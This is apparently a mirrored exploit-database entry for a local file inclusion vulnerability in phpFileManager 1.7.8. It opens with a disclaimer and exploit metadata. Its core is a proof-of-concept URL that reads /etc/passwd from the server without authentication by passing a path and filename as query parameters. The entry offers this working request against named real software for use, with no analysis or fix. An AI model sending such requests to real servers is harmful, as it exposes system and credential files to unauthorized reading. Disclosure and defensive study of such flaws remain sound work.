Phpfilemanager 1.7.8 local file inclusion Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-04-02 |
Type : webapps |
Platform : php
This exploit / vulnerability Phpfilemanager 1.7.8 local file inclusion is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: phpFileManager 1.7.8 - Local File Inclusion
# Date: 01.04.2019
# Exploit Author: Murat Kalafatoglu
# Vendor Homepage: https://sourceforge.net/projects/phpfm/
# Software Demo: https://phpfm-demo.000webhostapp.com/
# Version: v1.7.8
# Category: Webapps
# Tested on: XAMPP for Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target/index.php?action=3&fm_current_dir=%2Fetc%2F&filename=passwd